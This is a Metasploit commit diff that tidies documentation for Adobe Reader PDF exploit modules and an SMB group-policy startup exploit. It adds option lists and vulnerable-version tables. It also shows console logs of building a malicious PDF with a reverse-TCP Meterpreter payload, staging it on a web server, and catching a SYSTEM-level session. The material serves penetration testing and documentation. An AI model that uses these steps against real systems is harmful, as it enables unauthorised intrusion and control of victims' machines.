h00die review

Thanks h00die for the in depth review, as always.
rapid7 · Dec 10, 2019 · f0ac300 · f0ac300
1 parent 5e39749
commit f0ac300
Show file tree

Hide file tree

Showing 6 changed files with 103 additions and 40 deletions.
diff --git a/.../windows/fileformat/adobe_embedded_pdf.md → ...dows/fileformat/adobe_embedded_pdf_exe.md b/.../windows/fileformat/adobe_embedded_pdf.md → ...dows/fileformat/adobe_embedded_pdf_exe.md
@@ -17,6 +17,28 @@ Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/downl
    9. Do: `exploit`
    10. Do: `Open PDF on target machine with vulnerable software`
 
+## Options
+
+  ```
+  EXENAME
+  ```
+  The Name of payload exe.
+
+  ```
+  FILENAME
+  ```
+  The output filename.
+
+  ```
+  INFILENAME
+  ```
+  The Input PDF filename.
+
+  ```
+  LAUNCH_MESSAGE
+  ```
+  The message to display in the File: area of the PDF.
+
 ## Scenarios
 
 ### A run on Adobe Reader 8.2.0 and Windows XP (5.1 Build 2600, Service Pack 3)
@@ -34,13 +56,13 @@ Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/downl
     [*] Using 'windows/meterpreter/reverse_tcp' as payload...
     [+] Parsing Successful. Creating 'evil.pdf' file...
     [+] evil.pdf stored at /root/.msf4/local/evil.pdf
-  msf5 exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
     [*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
 
   msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
   msf exploit(multi/handler) > set LHOST 192.168.1.3
     LHOST => 192.168.1.3
-  msf5 exploit(multi/handler) > exploit
+  msf exploit(multi/handler) > exploit
 
     [*] Started reverse TCP handler on 192.168.1.3:4444
     [*] Sending stage (180291 bytes) to 192.168.1.5
@@ -69,5 +91,5 @@ Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/downl
 
 
 
-      [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
+    [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
       ```
diff --git a/documentation/modules/exploit/windows/fileformat/adobe_geticon.md b/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
@@ -1,9 +1,43 @@
 ## Vulnerable Application
 
-This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
 
 Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/download/acrobat-reader-8-0-0]
 
+### Test results (on Windows XP SP3)
+  reader 7.0.5 - no trigger
+  reader 7.0.8 - no trigger
+  reader 7.0.9 - no trigger
+  reader 7.1.0 - no trigger
+  reader 7.1.1 - reported not vulnerable
+  reader 8.0.0 - works
+  reader 8.1.2 - works
+  reader 8.1.3 - reported not vulnerable
+  reader 9.0.0 - works
+  reader 9.1.0 - reported not vulnerable
+
+## Options
+
+  ```
+  FILENAME
+  ```
+  The file name
+
+  ```
+  PDF::Encoder [value]
+  ```
+  Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
+
+  ```
+  PDF::Method [value]
+  ```
+  Select PAGE, DOCUMENT, or ANNOTATION
+
+  ```
+  PDF::Obfuscate [yes/no]
+  ```
+  Whether or not we should obfuscate the output
+
 ## Verification Steps
 
    1. Install application on the target machine

diff --git a/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md b/documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md
@@ -17,6 +17,18 @@ Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/downl
    9. Do: `exploit`
    10. Do: `Open PDF on target machine with vulnerable software`
 
+## Options
+
+  ```
+  FILENAME
+  ```
+  The file name.
+
+  ```
+  OBFUSCATE
+  ```
+  Enable JavaScript obfuscation
+
 ## Scenarios
 
 ### A run on Adobe Reader 9.4.0 and Windows XP (5.1 Build 2600, Service Pack 3)

diff --git a/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md b/documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md
@@ -6,16 +6,16 @@ Link to vulnerable software (OldVersion)[http://www.oldversion.com/windows/downl
 
 ## Verification Steps
 
-   1. Install application on the target machine
-   2. Start msfconsole
-   3. Do: `use [exploit/multi/handler]`
-   4. Do: `set LHOST [IP]`
-   5. Do: `exploit`
-   6. Do: `use exploit/windows/fileformat/adobe_utilprintf`
-   7. Do: `set payload [windows/meterpreter/reverse_tcp]`
-   8. Do: `set LHOST [IP]`
-   9. Do: `exploit`
-   10. Do: `Open PDF on target machine with vulnerable software`
+  1. Install application on the target machine
+  2. Start msfconsole
+  3. Do: `use exploit/windows/fileformat/adobe_utilprintf`
+  4. Do: `set payload [windows/meterpreter/reverse_tcp]`
+  5. Do: `set LHOST [IP]`
+  6. Do: `exploit`
+  7. Do: `use [exploit/multi/handler]`
+  8. Do: `set LHOST [IP]`
+  9. Do: `exploit`
+  10. Do: `Open PDF on target machine with vulnerable software`
 
 ## Scenarios
 

diff --git a/documentation/modules/exploit/windows/smb/group_policy_startup.md b/documentation/modules/exploit/windows/smb/group_policy_startup.md
@@ -6,36 +6,27 @@ More information available at [Gotham Digital Science Security](https://blog.gds
 
 ## Verification Steps
 
-2. Start msfconsole
-3. Do: `use modules/exploits/windows/smb/group_policy_startup`
-4. Do: `exploit`
+  1. Start msfconsole
+  2. Do: `use modules/exploits/windows/smb/group_policy_startup`
+  3. Do: `exploit`
 
 ## Options
 
-```
-set FILE_NAME [string]
-```
-VBS File name to share (Default: random .vbs)
-
-```
-set FOLDER_NAME [string]
-```
-Folder name to share (Default: none)
+  ```
+  FILE_NAME
+  ```
+  VBS File name to share (Default: random .vbs)
 
-```
-set SHARE [string]
-```
-Share (Default: Random)
+  ```
+  FOLDER_NAME
+  ```
+  Folder name to share (Default: none)
 
-```
-set SRVHOST [integer]
-```
-The local host to listen on. This must be an address on the local machine or 0.0.0.0
+  ```
+  SHARE
+  ```
+  Share name (Default: Random)
 
-```
-set SRVPORT [integer]
-```
-The local port to listen on.
 
 ## Scenarios
 
@@ -60,14 +51,14 @@ A run on Windows 7 (x64, Build 7601, SP1) and Server 2016 (x64, Version 1607, OS
   msf exploit(windows/smb/group_policy_startup) > sessions 1
     [*] Starting interaction with 1...
 
-    meterpreter > sysinfo
+  meterpreter > sysinfo
     Computer        : MSF-PC
     OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
     Architecture    : x64
     System Language : en_US
     Domain          : MSF
     Logged On Users : 1
     Meterpreter     : x86/windows
-    meterpreter > getuid
+  meterpreter > getuid
     Server username: NT AUTHORITY\SYSTEM
   ```
diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb
@@ -49,6 +49,10 @@ def initialize(info={})
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 26 2015'
+      'Notes' =>
+          {
+              'AKA' => ['badsamba']
+          }
     ))
 
     register_options(